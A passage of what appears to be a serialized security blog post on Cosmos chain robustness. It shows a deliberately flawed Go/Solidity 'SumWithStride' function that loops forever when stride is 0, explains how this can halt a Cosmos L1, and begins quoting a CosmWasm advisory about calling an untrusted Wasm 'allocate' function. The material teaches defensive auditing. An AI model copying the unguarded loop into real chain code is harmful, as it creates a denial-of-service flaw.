start;\n",{"type":26,"tag":137,"props":78632,"children":78633},{"class":5559,"line":5878},[78634,78638,78643,78647,78651],{"type":26,"tag":137,"props":78635,"children":78636},{"style":6009},[78637],{"type":32,"value":78533},{"type":26,"tag":137,"props":78639,"children":78640},{"style":5601},[78641],{"type":32,"value":78642}," sum ",{"type":26,"tag":137,"props":78644,"children":78645},{"style":5590},[78646],{"type":32,"value":289},{"type":26,"tag":137,"props":78648,"children":78649},{"style":5626},[78650],{"type":32,"value":5629},{"type":26,"tag":137,"props":78652,"children":78653},{"style":5601},[78654],{"type":32,"value":5604},{"type":26,"tag":137,"props":78656,"children":78657},{"class":5559,"line":5891},[78658,78662,78667,78671],{"type":26,"tag":137,"props":78659,"children":78660},{"style":6009},[78661],{"type":32,"value":78533},{"type":26,"tag":137,"props":78663,"children":78664},{"style":5601},[78665],{"type":32,"value":78666}," end ",{"type":26,"tag":137,"props":78668,"children":78669},{"style":5590},[78670],{"type":32,"value":289},{"type":26,"tag":137,"props":78672,"children":78673},{"style":5601},[78674],{"type":32,"value":78675}," arr.length;\n",{"type":26,"tag":137,"props":78677,"children":78678},{"class":5559,"line":5909},[78679],{"type":26,"tag":137,"props":78680,"children":78681},{"emptyLinePlaceholder":18},[78682],{"type":32,"value":6276},{"type":26,"tag":137,"props":78684,"children":78685},{"class":5559,"line":5930},[78686,78690,78695,78699],{"type":26,"tag":137,"props":78687,"children":78688},{"style":5610},[78689],{"type":32,"value":66974},{"type":26,"tag":137,"props":78691,"children":78692},{"style":5601},[78693],{"type":32,"value":78694}," (idx ",{"type":26,"tag":137,"props":78696,"children":78697},{"style":5590},[78698],{"type":32,"value":8391},{"type":26,"tag":137,"props":78700,"children":78701},{"style":5601},[78702],{"type":32,"value":78703}," end) {\n",{"type":26,"tag":137,"props":78705,"children":78706},{"class":5559,"line":5939},[78707,78712,78716],{"type":26,"tag":137,"props":78708,"children":78709},{"style":5601},[78710],{"type":32,"value":78711},"        sum ",{"type":26,"tag":137,"props":78713,"children":78714},{"style":5590},[78715],{"type":32,"value":71039},{"type":26,"tag":137,"props":78717,"children":78718},{"style":5601},[78719],{"type":32,"value":78720}," arr[idx];\n",{"type":26,"tag":137,"props":78722,"children":78723},{"class":5559,"line":6191},[78724,78729,78733],{"type":26,"tag":137,"props":78725,"children":78726},{"style":5601},[78727],{"type":32,"value":78728},"        idx ",{"type":26,"tag":137,"props":78730,"children":78731},{"style":5590},[78732],{"type":32,"value":71039},{"type":26,"tag":137,"props":78734,"children":78735},{"style":5601},[78736],{"type":32,"value":78737}," stride;\n",{"type":26,"tag":137,"props":78739,"children":78740},{"class":5559,"line":6208},[78741],{"type":26,"tag":137,"props":78742,"children":78743},{"style":5601},[78744],{"type":32,"value":5945},{"type":26,"tag":137,"props":78746,"children":78747},{"class":5559,"line":6225},[78748,78752],{"type":26,"tag":137,"props":78749,"children":78750},{"style":5610},[78751],{"type":32,"value":19582},{"type":26,"tag":137,"props":78753,"children":78754},{"style":5601},[78755],{"type":32,"value":78756}," sum;\n",{"type":26,"tag":137,"props":78758,"children":78759},{"class":5559,"line":6238},[78760],{"type":26,"tag":137,"props":78761,"children":78762},{"style":5601},[78763],{"type":32,"value":6507},{"type":26,"tag":5512,"props":78765,"children":78769},{"code":78766,"language":78767,"meta":7,"className":78768,"style":7},"type MsgSumWithStrideParams struct {\n    Start uint64\n    Stride uint64\n    Arr []uint64\n}\n\ntype MsgSumWithStrideResponse struct {\n    Sum uint64\n}\n\nfunc (ms msgServer) SumWithStride(\n    goCtx context.Context,\n    msg *MsgSumWithStrideParams,\n) (*MsgSumWithStrideResponse, error) {\n    sum := uint64(0)\n    end := uint64(len(msg.Arr))\n    for idx := msg.Start; idx \u003C end; idx += msg.Stride {\n        sum += msg.Arr[idx]\n    }\n    return &MsgSumWithStrideResponse{Sum: sum}, nil\n}\n","go","language-go shiki shiki-themes slack-dark",[78770],{"type":26,"tag":130,"props":78771,"children":78772},{"__ignoreMap":7},[78773,78793,78806,78818,78836,78843,78850,78870,78882,78889,78896,78931,78957,78978,79007,79037,79082,79159,79195,79202,79246],{"type":26,"tag":137,"props":78774,"children":78775},{"class":5559,"line":5560},[78776,78780,78785,78789],{"type":26,"tag":137,"props":78777,"children":78778},{"style":5573},[78779],{"type":32,"value":35352},{"type":26,"tag":137,"props":78781,"children":78782},{"style":6009},[78783],{"type":32,"value":78784}," MsgSumWithStrideParams",{"type":26,"tag":137,"props":78786,"children":78787},{"style":5573},[78788],{"type":32,"value":23744},{"type":26,"tag":137,"props":78790,"children":78791},{"style":5601},[78792],{"type":32,"value":5875},{"type":26,"tag":137,"props":78794,"children":78795},{"class":5559,"line":5412},[78796,78801],{"type":26,"tag":137,"props":78797,"children":78798},{"style":5584},[78799],{"type":32,"value":78800},"    Start",{"type":26,"tag":137,"props":78802,"children":78803},{"style":6009},[78804],{"type":32,"value":78805}," uint64\n",{"type":26,"tag":137,"props":78807,"children":78808},{"class":5559,"line":5417},[78809,78814],{"type":26,"tag":137,"props":78810,"children":78811},{"style":5584},[78812],{"type":32,"value":78813},"    Stride",{"type":26,"tag":137,"props":78815,"children":78816},{"style":6009},[78817],{"type":32,"value":78805},{"type":26,"tag":137,"props":78819,"children":78820},{"class":5559,"line":5642},[78821,78826,78831],{"type":26,"tag":137,"props":78822,"children":78823},{"style":5584},[78824],{"type":32,"value":78825},"    Arr",{"type":26,"tag":137,"props":78827,"children":78828},{"style":5601},[78829],{"type":32,"value":78830}," []",{"type":26,"tag":137,"props":78832,"children":78833},{"style":6009},[78834],{"type":32,"value":78835},"uint64\n",{"type":26,"tag":137,"props":78837,"children":78838},{"class":5559,"line":5745},[78839],{"type":26,"tag":137,"props":78840,"children":78841},{"style":5601},[78842],{"type":32,"value":6507},{"type":26,"tag":137,"props":78844,"children":78845},{"class":5559,"line":5850},[78846],{"type":26,"tag":137,"props":78847,"children":78848},{"emptyLinePlaceholder":18},[78849],{"type":32,"value":6276},{"type":26,"tag":137,"props":78851,"children":78852},{"class":5559,"line":5878},[78853,78857,78862,78866],{"type":26,"tag":137,"props":78854,"children":78855},{"style":5573},[78856],{"type":32,"value":35352},{"type":26,"tag":137,"props":78858,"children":78859},{"style":6009},[78860],{"type":32,"value":78861}," MsgSumWithStrideResponse",{"type":26,"tag":137,"props":78863,"children":78864},{"style":5573},[78865],{"type":32,"value":23744},{"type":26,"tag":137,"props":78867,"children":78868},{"style":5601},[78869],{"type":32,"value":5875},{"type":26,"tag":137,"props":78871,"children":78872},{"class":5559,"line":5891},[78873,78878],{"type":26,"tag":137,"props":78874,"children":78875},{"style":5584},[78876],{"type":32,"value":78877},"    Sum",{"type":26,"tag":137,"props":78879,"children":78880},{"style":6009},[78881],{"type":32,"value":78805},{"type":26,"tag":137,"props":78883,"children":78884},{"class":5559,"line":5909},[78885],{"type":26,"tag":137,"props":78886,"children":78887},{"style":5601},[78888],{"type":32,"value":6507},{"type":26,"tag":137,"props":78890,"children":78891},{"class":5559,"line":5930},[78892],{"type":26,"tag":137,"props":78893,"children":78894},{"emptyLinePlaceholder":18},[78895],{"type":32,"value":6276},{"type":26,"tag":137,"props":78897,"children":78898},{"class":5559,"line":5939},[78899,78904,78908,78913,78918,78922,78927],{"type":26,"tag":137,"props":78900,"children":78901},{"style":5573},[78902],{"type":32,"value":78903},"func",{"type":26,"tag":137,"props":78905,"children":78906},{"style":5601},[78907],{"type":32,"value":4625},{"type":26,"tag":137,"props":78909,"children":78910},{"style":5584},[78911],{"type":32,"value":78912},"ms ",{"type":26,"tag":137,"props":78914,"children":78915},{"style":6009},[78916],{"type":32,"value":78917},"msgServer",{"type":26,"tag":137,"props":78919,"children":78920},{"style":5601},[78921],{"type":32,"value":5671},{"type":26,"tag":137,"props":78923,"children":78924},{"style":5682},[78925],{"type":32,"value":78926},"SumWithStride",{"type":26,"tag":137,"props":78928,"children":78929},{"style":5601},[78930],{"type":32,"value":6054},{"type":26,"tag":137,"props":78932,"children":78933},{"class":5559,"line":6191},[78934,78939,78944,78948,78953],{"type":26,"tag":137,"props":78935,"children":78936},{"style":5584},[78937],{"type":32,"value":78938},"    goCtx",{"type":26,"tag":137,"props":78940,"children":78941},{"style":6009},[78942],{"type":32,"value":78943}," context",{"type":26,"tag":137,"props":78945,"children":78946},{"style":5601},[78947],{"type":32,"value":470},{"type":26,"tag":137,"props":78949,"children":78950},{"style":6009},[78951],{"type":32,"value":78952},"Context",{"type":26,"tag":137,"props":78954,"children":78955},{"style":5601},[78956],{"type":32,"value":6099},{"type":26,"tag":137,"props":78958,"children":78959},{"class":5559,"line":6208},[78960,78965,78969,78974],{"type":26,"tag":137,"props":78961,"children":78962},{"style":5584},[78963],{"type":32,"value":78964},"    msg",{"type":26,"tag":137,"props":78966,"children":78967},{"style":5590},[78968],{"type":32,"value":12406},{"type":26,"tag":137,"props":78970,"children":78971},{"style":6009},[78972],{"type":32,"value":78973},"MsgSumWithStrideParams",{"type":26,"tag":137,"props":78975,"children":78976},{"style":5601},[78977],{"type":32,"value":6099},{"type":26,"tag":137,"props":78979,"children":78980},{"class":5559,"line":6225},[78981,78986,78990,78995,78999,79003],{"type":26,"tag":137,"props":78982,"children":78983},{"style":5601},[78984],{"type":32,"value":78985},") (",{"type":26,"tag":137,"props":78987,"children":78988},{"style":5590},[78989],{"type":32,"value":7152},{"type":26,"tag":137,"props":78991,"children":78992},{"style":6009},[78993],{"type":32,"value":78994},"MsgSumWithStrideResponse",{"type":26,"tag":137,"props":78996,"children":78997},{"style":5601},[78998],{"type":32,"value":1108},{"type":26,"tag":137,"props":79000,"children":79001},{"style":6009},[79002],{"type":32,"value":17455},{"type":26,"tag":137,"props":79004,"children":79005},{"style":5601},[79006],{"type":32,"value":17395},{"type":26,"tag":137,"props":79008,"children":79009},{"class":5559,"line":6238},[79010,79015,79020,79025,79029,79033],{"type":26,"tag":137,"props":79011,"children":79012},{"style":5584},[79013],{"type":32,"value":79014},"    sum",{"type":26,"tag":137,"props":79016,"children":79017},{"style":5590},[79018],{"type":32,"value":79019}," :=",{"type":26,"tag":137,"props":79021,"children":79022},{"style":6009},[79023],{"type":32,"value":79024}," uint64",{"type":26,"tag":137,"props":79026,"children":79027},{"style":5601},[79028],{"type":32,"value":165},{"type":26,"tag":137,"props":79030,"children":79031},{"style":5626},[79032],{"type":32,"value":1817},{"type":26,"tag":137,"props":79034,"children":79035},{"style":5601},[79036],{"type":32,"value":5742},{"type":26,"tag":137,"props":79038,"children":79039},{"class":5559,"line":6247},[79040,79045,79049,79053,79057,79061,79065,79069,79073,79078],{"type":26,"tag":137,"props":79041,"children":79042},{"style":5584},[79043],{"type":32,"value":79044},"    end",{"type":26,"tag":137,"props":79046,"children":79047},{"style":5590},[79048],{"type":32,"value":79019},{"type":26,"tag":137,"props":79050,"children":79051},{"style":6009},[79052],{"type":32,"value":79024},{"type":26,"tag":137,"props":79054,"children":79055},{"style":5601},[79056],{"type":32,"value":165},{"type":26,"tag":137,"props":79058,"children":79059},{"style":5682},[79060],{"type":32,"value":11727},{"type":26,"tag":137,"props":79062,"children":79063},{"style":5601},[79064],{"type":32,"value":165},{"type":26,"tag":137,"props":79066,"children":79067},{"style":5584},[79068],{"type":32,"value":60547},{"type":26,"tag":137,"props":79070,"children":79071},{"style":5601},[79072],{"type":32,"value":470},{"type":26,"tag":137,"props":79074,"children":79075},{"style":5584},[79076],{"type":32,"value":79077},"Arr",{"type":26,"tag":137,"props":79079,"children":79080},{"style":5601},[79081],{"type":32,"value":22305},{"type":26,"tag":137,"props":79083,"children":79084},{"class":5559,"line":6270},[79085,79089,79094,79098,79103,79107,79112,79116,79121,79125,79130,79134,79138,79142,79146,79150,79155],{"type":26,"tag":137,"props":79086,"children":79087},{"style":5610},[79088],{"type":32,"value":5613},{"type":26,"tag":137,"props":79090,"children":79091},{"style":5584},[79092],{"type":32,"value":79093}," idx",{"type":26,"tag":137,"props":79095,"children":79096},{"style":5590},[79097],{"type":32,"value":79019},{"type":26,"tag":137,"props":79099,"children":79100},{"style":5584},[79101],{"type":32,"value":79102}," msg",{"type":26,"tag":137,"props":79104,"children":79105},{"style":5601},[79106],{"type":32,"value":470},{"type":26,"tag":137,"props":79108,"children":79109},{"style":5584},[79110],{"type":32,"value":79111},"Start",{"type":26,"tag":137,"props":79113,"children":79114},{"style":5601},[79115],{"type":32,"value":19820},{"type":26,"tag":137,"props":79117,"children":79118},{"style":5584},[79119],{"type":32,"value":79120},"idx",{"type":26,"tag":137,"props":79122,"children":79123},{"style":5590},[79124],{"type":32,"value":11305},{"type":26,"tag":137,"props":79126,"children":79127},{"style":5584},[79128],{"type":32,"value":79129}," end",{"type":26,"tag":137,"props":79131,"children":79132},{"style":5601},[79133],{"type":32,"value":19820},{"type":26,"tag":137,"props":79135,"children":79136},{"style":5584},[79137],{"type":32,"value":79120},{"type":26,"tag":137,"props":79139,"children":79140},{"style":5590},[79141],{"type":32,"value":17656},{"type":26,"tag":137,"props":79143,"children":79144},{"style":5584},[79145],{"type":32,"value":79102},{"type":26,"tag":137,"props":79147,"children":79148},{"style":5601},[79149],{"type":32,"value":470},{"type":26,"tag":137,"props":79151,"children":79152},{"style":5584},[79153],{"type":32,"value":79154},"Stride",{"type":26,"tag":137,"props":79156,"children":79157},{"style":5601},[79158],{"type":32,"value":5875},{"type":26,"tag":137,"props":79160,"children":79161},{"class":5559,"line":6279},[79162,79167,79171,79175,79179,79183,79187,79191],{"type":26,"tag":137,"props":79163,"children":79164},{"style":5584},[79165],{"type":32,"value":79166},"        sum",{"type":26,"tag":137,"props":79168,"children":79169},{"style":5590},[79170],{"type":32,"value":17656},{"type":26,"tag":137,"props":79172,"children":79173},{"style":5584},[79174],{"type":32,"value":79102},{"type":26,"tag":137,"props":79176,"children":79177},{"style":5601},[79178],{"type":32,"value":470},{"type":26,"tag":137,"props":79180,"children":79181},{"style":5584},[79182],{"type":32,"value":79077},{"type":26,"tag":137,"props":79184,"children":79185},{"style":5601},[79186],{"type":32,"value":3016},{"type":26,"tag":137,"props":79188,"children":79189},{"style":5584},[79190],{"type":32,"value":79120},{"type":26,"tag":137,"props":79192,"children":79193},{"style":5601},[79194],{"type":32,"value":14363},{"type":26,"tag":137,"props":79196,"children":79197},{"class":5559,"line":6288},[79198],{"type":26,"tag":137,"props":79199,"children":79200},{"style":5601},[79201],{"type":32,"value":5945},{"type":26,"tag":137,"props":79203,"children":79204},{"class":5559,"line":6355},[79205,79209,79213,79217,79222,79227,79231,79236,79241],{"type":26,"tag":137,"props":79206,"children":79207},{"style":5610},[79208],{"type":32,"value":19582},{"type":26,"tag":137,"props":79210,"children":79211},{"style":5590},[79212],{"type":32,"value":9725},{"type":26,"tag":137,"props":79214,"children":79215},{"style":6009},[79216],{"type":32,"value":78994},{"type":26,"tag":137,"props":79218,"children":79219},{"style":5601},[79220],{"type":32,"value":79221},"{",{"type":26,"tag":137,"props":79223,"children":79224},{"style":5584},[79225],{"type":32,"value":79226},"Sum",{"type":26,"tag":137,"props":79228,"children":79229},{"style":5601},[79230],{"type":32,"value":17923},{"type":26,"tag":137,"props":79232,"children":79233},{"style":5584},[79234],{"type":32,"value":79235},"sum",{"type":26,"tag":137,"props":79237,"children":79238},{"style":5601},[79239],{"type":32,"value":79240},"}, ",{"type":26,"tag":137,"props":79242,"children":79243},{"style":5573},[79244],{"type":32,"value":79245},"nil\n",{"type":26,"tag":137,"props":79247,"children":79248},{"class":5559,"line":6363},[79249],{"type":26,"tag":137,"props":79250,"children":79251},{"style":5601},[79252],{"type":32,"value":6507},{"type":26,"tag":35,"props":79254,"children":79255},{},[79256,79258,79263,79264,79270],{"type":32,"value":79257},"The provided Solidity / Cosmos snippets feature a public function that calculates the sums of an array using a provided starting ",{"type":26,"tag":130,"props":79259,"children":79261},{"className":79260},[],[79262],{"type":32,"value":79120},{"type":32,"value":9898},{"type":26,"tag":130,"props":79265,"children":79267},{"className":79266},[],[79268],{"type":32,"value":79269},"stride",{"type":32,"value":79271},". It is crucial to note that this function lacks robustness. A keen observer might have already identified that if the user supplies a stride value of 0, the code will result in an infinite loop.",{"type":26,"tag":35,"props":79273,"children":79274},{},[79275],{"type":32,"value":79276},"While an infinite loop is not ideal for Solidity, it may still be tolerable. The underlying blockchain on which a smart contract operates is responsible for monitoring the gas and computation budget. It will intervene and terminate the execution at a certain point. Interestingly, those types of \"unhandled error\" patterns are quite common occurrences in contracts.",{"type":26,"tag":35,"props":79278,"children":79279},{},[79280],{"type":32,"value":79281},"However, the same logic does not directly apply to Cosmos. In Cosmos, users are responsible for implementing the entire L1, and there is no underlying computation budget tracker that automatically stops code execution. As a result, any potential logic DoS or infinite loop can directly lead to the custom Cosmos L1 chain halting or stalling.",{"type":26,"tag":35,"props":79283,"children":79284},{},[79285],{"type":32,"value":79286},"This toy scenario captures the importance of attention to error handling, edge cases, and overall robustness in Cosmos.",{"type":26,"tag":118,"props":79288,"children":79290},{"id":79289},"real-world-examples",[79291],{"type":32,"value":79292},"Real-World Examples",{"type":26,"tag":35,"props":79294,"children":79295},{},[79296],{"type":32,"value":79297},"Now, let's examine a few real-world instances.",{"type":26,"tag":35,"props":79299,"children":79300},{},[79301,79303,79309,79310,79316,79318,79324,79326,79332],{"type":32,"value":79302},"In the case of ",{"type":26,"tag":41,"props":79304,"children":79307},{"href":79305,"rel":79306},"https://github.com/JumpCrypto/security-research/blob/e900a400f763075bdae161f4fd6e36d70da1d844/advisories/2023-003-cosmwasm.md",[45],[79308],{"type":32,"value":20285},{"type":32,"value":1011},{"type":26,"tag":130,"props":79311,"children":79313},{"className":79312},[],[79314],{"type":32,"value":79315},"CosmWasm",{"type":32,"value":79317}," bug, the helper method ",{"type":26,"tag":130,"props":79319,"children":79321},{"className":79320},[],[79322],{"type":32,"value":79323},"write_to_contract",{"type":32,"value":79325}," negligently calls the untrusted Wasm function ",{"type":26,"tag":130,"props":79327,"children":79329},{"className":79328},[],[79330],{"type":32,"value":79331},"\"allocate\"",{"type":32,"value":470},{"type":26,"tag":35,"props":79334,"children":79335},{},[79336],{"type":26,"tag":41,"props":79337,"children":79340},{"href":79338,"rel":79339},"https://github.com/CosmWasm/cosmwasm/blob/db426f9b15eabf18359df62878847bbaa7cb85ef/packages/vm/src/imports.rs#L409",[45],[79341],{"type":32,"value":79342},"Permalink for snippet",{"type":26,"tag":5512,"props":79344,"children":79346},{"code":79345,"language":5551,"meta":7,"className":5552,"style":7},"fn write_to_contract\u003CA: BackendApi, S: Storage, Q: Querier>(\n    env: &Environment\u003CA, S, Q>,\n    input: &[u8],\n) -> VmResult\u003Cu32> {\n    let out_size = to_u32(input.len())?;\n    let result = env.call_function1(\"allocate\", &[out_size.into()])?;\n    let target_ptr = ref_to_u32(&result)?;\n    if target_ptr == 0 {\n        return Err(CommunicationError::zero_address().into());\n    }\n    write_region(&env.memory(), target_ptr, input)?;\n    Ok(target_ptr)\n}\n",[79347],{"type":26,"tag":130,"props":79348,"children":79349},{"__ignoreMap":7},[79350,79418,79466,79494,79523,79572,79646,79691,79714,79759,79766,79823,79842],{"type":26,"tag":137,"props":79351,"children":79352},{"class":5559,"line":5560},[79353,79357,79362,79366,79371,79375,79380,79384,79388,79392,79397,79401,79405,79409,79414],{"type":26,"tag":137,"props":79354,"children":79355},{"style":5573},[79356],{"type":32,"value":22860},{"type":26,"tag":137,"props":79358,"children":79359},{"style":5682},[79360],{"type":32,"value":79361}," write_to_contract",{"type":26,"tag":137,"props":79363,"children":79364},{"style":5601},[79365],{"type":32,"value":8391},{"type":26,"tag":137,"props":79367,"children":79368},{"style":6009},[79369],{"type":32,"value":79370},"A",{"type":26,"tag":137,"props":79372,"children":79373},{"style":5590},[79374],{"type":32,"value":7072},{"type":26,"tag":137,"props":79376,"children":79377},{"style":6009},[79378],{"type":32,"value":79379}," BackendApi",{"type":26,"tag":137,"props":79381,"children":79382},{"style":5601},[79383],{"type":32,"value":1108},{"type":26,"tag":137,"props":79385,"children":79386},{"style":6009},[79387],{"type":32,"value":24630},{"type":26,"tag":137,"props":79389,"children":79390},{"style":5590},[79391],{"type":32,"value":7072},{"type":26,"tag":137,"props":79393,"children":79394},{"style":6009},[79395],{"type":32,"value":79396}," Storage",{"type":26,"tag":137,"props":79398,"children":79399},{"style":5601},[79400],{"type":32,"value":1108},{"type":26,"tag":137,"props":79402,"children":79403},{"style":6009},[79404],{"type":32,"value":1334},{"type":26,"tag":137,"props":79406,"children":79407},{"style":5590},[79408],{"type":32,"value":7072},{"type":26,"tag":137,"props":79410,"children":79411},{"style":6009},[79412],{"type":32,"value":79413}," Querier",{"type":26,"tag":137,"props":79415,"children":79416},{"style":5601},[79417],{"type":32,"value":9172},{"type":26,"tag":137,"props":79419,"children":79420},{"class":5559,"line":5412},[79421,79425,79429,79433,79438,79442,79446,79450,79454,79458,79462],{"type":26,"tag":137,"props":79422,"children":79423},{"style":5584},[79424],{"type":32,"value":6447},{"type":26,"tag":137,"props":79426,"children":79427},{"style":5590},[79428],{"type":32,"value":7072},{"type":26,"tag":137,"props":79430,"children":79431},{"style":5590},[79432],{"type":32,"value":9725},{"type":26,"tag":137,"props":79434,"children":79435},{"style":6009},[79436],{"type":32,"value":79437},"Environment",{"type":26,"tag":137,"props":79439,"children":79440},{"style":5601},[79441],{"type":32,"value":8391},{"type":26,"tag":137,"props":79443,"children":79444},{"style":6009},[79445],{"type":32,"value":79370},{"type":26,"tag":137,"props":79447,"children":79448},{"style":5601},[79449],{"type":32,"value":1108},{"type":26,"tag":137,"props":79451,"children":79452},{"style":6009},[79453],{"type":32,"value":24630},{"type":26,"tag":137,"props":79455,"children":79456},{"style":5601},[79457],{"type":32,"value":1108},{"type":26,"tag":137,"props":79459,"children":79460},{"style":6009},[79461],{"type":32,"value":1334},{"type":26,"tag":137,"props":79463,"children":79464},{"style":5601},[79465],{"type":32,"value":8723},{"type":26,"tag":137,"props":79467,"children":79468},{"class":5559,"line":5417},[79469,79474,79478,79482,79486,79490],{"type":26,"tag":137,"props":79470,"children":79471},{"style":5584},[79472],{"type":32,"value":79473},"    input",{"type":26,"tag":137,"props":79475,"children":79476},{"style":5590},[79477],{"type":32,"value":7072},{"type":26,"tag":137,"props":79479,"children":79480},{"style":5590},[79481],{"type":32,"value":9725},{"type":26,"tag":137,"props":79483,"children":79484},{"style":5601},[79485],{"type":32,"value":3016},{"type":26,"tag":137,"props":79487,"children":79488},{"style":6009},[79489],{"type":32,"value":6012},{"type":26,"tag":137,"props":79491,"children":79492},{"style":5601},[79493],{"type":32,"value":16854},{"type":26,"tag":137,"props":79495,"children":79496},{"class":5559,"line":5642},[79497,79501,79505,79510,79514,79519],{"type":26,"tag":137,"props":79498,"children":79499},{"style":5601},[79500],{"type":32,"value":5671},{"type":26,"tag":137,"props":79502,"children":79503},{"style":5590},[79504],{"type":32,"value":16348},{"type":26,"tag":137,"props":79506,"children":79507},{"style":6009},[79508],{"type":32,"value":79509}," VmResult",{"type":26,"tag":137,"props":79511,"children":79512},{"style":5601},[79513],{"type":32,"value":8391},{"type":26,"tag":137,"props":79515,"children":79516},{"style":6009},[79517],{"type":32,"value":79518},"u32",{"type":26,"tag":137,"props":79520,"children":79521},{"style":5601},[79522],{"type":32,"value":9865},{"type":26,"tag":137,"props":79524,"children":79525},{"class":5559,"line":5745},[79526,79530,79535,79539,79544,79548,79552,79556,79560,79564,79568],{"type":26,"tag":137,"props":79527,"children":79528},{"style":5573},[79529],{"type":32,"value":5576},{"type":26,"tag":137,"props":79531,"children":79532},{"style":5584},[79533],{"type":32,"value":79534}," out_size",{"type":26,"tag":137,"props":79536,"children":79537},{"style":5590},[79538],{"type":32,"value":5593},{"type":26,"tag":137,"props":79540,"children":79541},{"style":5682},[79542],{"type":32,"value":79543}," to_u32",{"type":26,"tag":137,"props":79545,"children":79546},{"style":5601},[79547],{"type":32,"value":165},{"type":26,"tag":137,"props":79549,"children":79550},{"style":5584},[79551],{"type":32,"value":10952},{"type":26,"tag":137,"props":79553,"children":79554},{"style":5590},[79555],{"type":32,"value":470},{"type":26,"tag":137,"props":79557,"children":79558},{"style":5682},[79559],{"type":32,"value":11727},{"type":26,"tag":137,"props":79561,"children":79562},{"style":5601},[79563],{"type":32,"value":44562},{"type":26,"tag":137,"props":79565,"children":79566},{"style":5590},[79567],{"type":32,"value":5737},{"type":26,"tag":137,"props":79569,"children":79570},{"style":5601},[79571],{"type":32,"value":5604},{"type":26,"tag":137,"props":79573,"children":79574},{"class":5559,"line":5850},[79575,79579,79583,79587,79591,79595,79600,79604,79608,79612,79616,79620,79625,79629,79633,79638,79642],{"type":26,"tag":137,"props":79576,"children":79577},{"style":5573},[79578],{"type":32,"value":5576},{"type":26,"tag":137,"props":79580,"children":79581},{"style":5584},[79582],{"type":32,"value":11748},{"type":26,"tag":137,"props":79584,"children":79585},{"style":5590},[79586],{"type":32,"value":5593},{"type":26,"tag":137,"props":79588,"children":79589},{"style":5584},[79590],{"type":32,"value":45556},{"type":26,"tag":137,"props":79592,"children":79593},{"style":5590},[79594],{"type":32,"value":470},{"type":26,"tag":137,"props":79596,"children":79597},{"style":5682},[79598],{"type":32,"value":79599},"call_function1",{"type":26,"tag":137,"props":79601,"children":79602},{"style":5601},[79603],{"type":32,"value":165},{"type":26,"tag":137,"props":79605,"children":79606},{"style":6837},[79607],{"type":32,"value":79331},{"type":26,"tag":137,"props":79609,"children":79610},{"style":5601},[79611],{"type":32,"value":1108},{"type":26,"tag":137,"props":79613,"children":79614},{"style":5590},[79615],{"type":32,"value":5694},{"type":26,"tag":137,"props":79617,"children":79618},{"style":5601},[79619],{"type":32,"value":3016},{"type":26,"tag":137,"props":79621,"children":79622},{"style":5584},[79623],{"type":32,"value":79624},"out_size",{"type":26,"tag":137,"props":79626,"children":79627},{"style":5590},[79628],{"type":32,"value":470},{"type":26,"tag":137,"props":79630,"children":79631},{"style":5682},[79632],{"type":32,"value":17477},{"type":26,"tag":137,"props":79634,"children":79635},{"style":5601},[79636],{"type":32,"value":79637},"()])",{"type":26,"tag":137,"props":79639,"children":79640},{"style":5590},[79641],{"type":32,"value":5737},{"type":26,"tag":137,"props":79643,"children":79644},{"style":5601},[79645],{"type":32,"value":5604},{"type":26,"tag":137,"props":79647,"children":79648},{"class":5559,"line":5878},[79649,79653,79658,79662,79667,79671,79675,79679,79683,79687],{"type":26,"tag":137,"props":79650,"children":79651},{"style":5573},[79652],{"type":32,"value":5576},{"type":26,"tag":137,"props":79654,"children":79655},{"style":5584},[79656],{"type":32,"value":79657}," target_ptr",{"type":26,"tag":137,"props":79659,"children":79660},{"style":5590},[79661],{"type":32,"value":5593},{"type":26,"tag":137,"props":79663,"children":79664},{"style":5682},[79665],{"type":32,"value":79666}," ref_to_u32",{"type":26,"tag":137,"props":79668,"children":79669},{"style":5601},[79670],{"type":32,"value":165},{"type":26,"tag":137,"props":79672,"children":79673},{"style":5590},[79674],{"type":32,"value":5694},{"type":26,"tag":137,"props":79676,"children":79677},{"style":5584},[79678],{"type":32,"value":11670},{"type":26,"tag":137,"props":79680,"children":79681},{"style":5601},[79682],{"type":32,"value":200},{"type":26,"tag":137,"props":79684,"children":79685},{"style":5590},[79686],{"type":32,"value":5737},{"type":26,"tag":137,"props":79688,"children":79689},{"style":5601},[79690],{"type":32,"value":5604},{"type":26,"tag":137,"props":79692,"children":79693},{"class":5559,"line":5891},[79694,79698,79702,79706,79710],{"type":26,"tag":137,"props":79695,"children":79696},{"style":5610},[79697],{"type":32,"value":14870},{"type":26,"tag":137,"props":79699,"children":79700},{"style":5584},[79701],{"type":32,"value":79657},{"type":26,"tag":137,"props":79703,"children":79704},{"style":5590},[79705],{"type":32,"value":5866},{"type":26,"tag":137,"props":79707,"children":79708},{"style":5626},[79709],{"type":32,"value":5629},{"type":26,"tag":137,"props":79711,"children":79712},{"style":5601},[79713],{"type":32,"value":5875},{"type":26,"tag":137,"props":79715,"children":79716},{"class":5559,"line":5909},[79717,79721,79725,79729,79734,79738,79743,79747,79751,79755],{"type":26,"tag":137,"props":79718,"children":79719},{"style":5610},[79720],{"type":32,"value":18336},{"type":26,"tag":137,"props":79722,"children":79723},{"style":6009},[79724],{"type":32,"value":18341},{"type":26,"tag":137,"props":79726,"children":79727},{"style":5601},[79728],{"type":32,"value":165},{"type":26,"tag":137,"props":79730,"children":79731},{"style":6009},[79732],{"type":32,"value":79733},"CommunicationError",{"type":26,"tag":137,"props":79735,"children":79736},{"style":5590},[79737],{"type":32,"value":6072},{"type":26,"tag":137,"props":79739,"children":79740},{"style":5682},[79741],{"type":32,"value":79742},"zero_address",{"type":26,"tag":137,"props":79744,"children":79745},{"style":5601},[79746],{"type":32,"value":16470},{"type":26,"tag":137,"props":79748,"children":79749},{"style":5590},[79750],{"type":32,"value":470},{"type":26,"tag":137,"props":79752,"children":79753},{"style":5682},[79754],{"type":32,"value":17477},{"type":26,"tag":137,"props":79756,"children":79757},{"style":5601},[79758],{"type":32,"value":18016},{"type":26,"tag":137,"props":79760,"children":79761},{"class":5559,"line":5930},[79762],{"type":26,"tag":137,"props":79763,"children":79764},{"style":5601},[79765],{"type":32,"value":5945},{"type":26,"tag":137,"props":79767,"children":79768},{"class":5559,"line":5939},[79769,79774,79778,79782,79786,79790,79794,79798,79803,79807,79811,79815,79819],{"type":26,"tag":137,"props":79770,"children":79771},{"style":5682},[79772],{"type":32,"value":79773},"    